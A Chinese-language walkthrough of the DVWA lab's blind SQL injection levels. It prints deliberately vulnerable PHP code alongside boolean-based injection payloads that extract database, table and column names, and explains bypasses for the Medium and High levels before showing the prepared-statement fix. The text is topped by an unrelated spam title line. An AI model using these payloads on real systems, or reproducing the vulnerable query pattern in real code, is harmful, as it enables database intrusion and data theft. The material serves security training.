日韩精品一区二区三区中文精品,国产小屁孩cao大人在线播放

4、DVWA SQL Injection (Blind)分析與利用

### Low 漏洞代碼： ``` <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num > 0 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?> ``` 直接拼接sql語句沒有任何處理，查詢結(jié)果只有 “User ID exists in the database.” 和 “User ID is MISSING from the database.” 漏洞利用： 1、判斷注入是字符型還是數(shù)字型輸入：1' and 1=1;# 輸出：User ID exists in the database. 輸入：1' and 1=2;# 輸出：User ID is MISSING from the database. 是字符型注入。 2、猜解當(dāng)前數(shù)據(jù)庫信息猜解數(shù)據(jù)庫長度： 1' and length(database())=4;# 數(shù)據(jù)庫名的長度是4位。使用二分法猜解數(shù)據(jù)庫名： 1' and ascii(substr(database(),1,1)) > 100;# User ID is MISSING from the database. 1' and ascii(substr(database(),1,1)) < 100;# User ID is MISSING from the database. 判斷出數(shù)據(jù)庫名的第一個ascii字符為100，就是d，以此按照以上方法可以猜解出數(shù)據(jù)庫名dvwa。 3、猜解表信息猜解表數(shù)： 1' and (select count(table_name) from information_schema.tables where table_schema=database())=1; # 1' and (select count(table_name) from information_schema.tables where table_schema=database())=2; # 判斷出數(shù)據(jù)庫中存在兩個表 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9; # 判斷出第一個表名的長度為9 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97; # 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<110; # 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100; # 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103; # 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103; # 判斷出第一個表名的第一個字母是g 重復(fù)以上步驟，猜解出兩個表名分別為 guestbook，users 4、猜解字段名猜解字段的數(shù)量： 1' and (select count(column_name) from information_schema.columns where table_name='users')=8; # 輸出：User ID exists in the database. 猜解字段名： 1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7; # 可知users表中第一個字段長度是7位，使用上面的二分法可猜解出字段名。 ........ ### Medium 漏洞代碼： ``` <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num > 0 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } //mysql_close(); } ?> ``` 后端使用了post獲取ID，且前端使用了下拉來限制輸入，使用burp抓包工具可以繞過。 mysqli_real_escape_string函數(shù)轉(zhuǎn)義 x00,n,r,,’,”,x1a特殊字符，含有這些特殊字符的payload可以用16進制編碼繞過。 ### High 漏洞代碼： ``` <?php if( isset( $_COOKIE[ 'id' ] ) ) { // Get input $id = $_COOKIE[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num > 0 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // Might sleep a random amount if( rand( 0, 5 ) == 3 ) { sleep( rand( 2, 4 ) ); } // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?> ``` 后端使用了cookie獲取ID，limit限制現(xiàn)實結(jié)果只有1個，rand函數(shù)擾亂基于時間的盲注。使用burp修改cookie參數(shù)中的ID值為payload注入，加入#字符注釋limit即可繞過限制結(jié)果為1的問題。 ### Impossible 漏洞代碼： ``` <?php if( isset( $_GET[ 'Submit' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $id = $_GET[ 'id' ]; // Was a number entered? if(is_numeric( $id )) { // Check the database $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); $data->bindParam( ':id', $id, PDO::PARAM_INT ); $data->execute(); // Get results if( $data->rowCount() == 1 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } } } // Generate Anti-CSRF token generateSessionToken(); ?> ``` checkToken防止csrf漏洞， PDO使得數(shù)據(jù)和代碼分離，保證了安全性。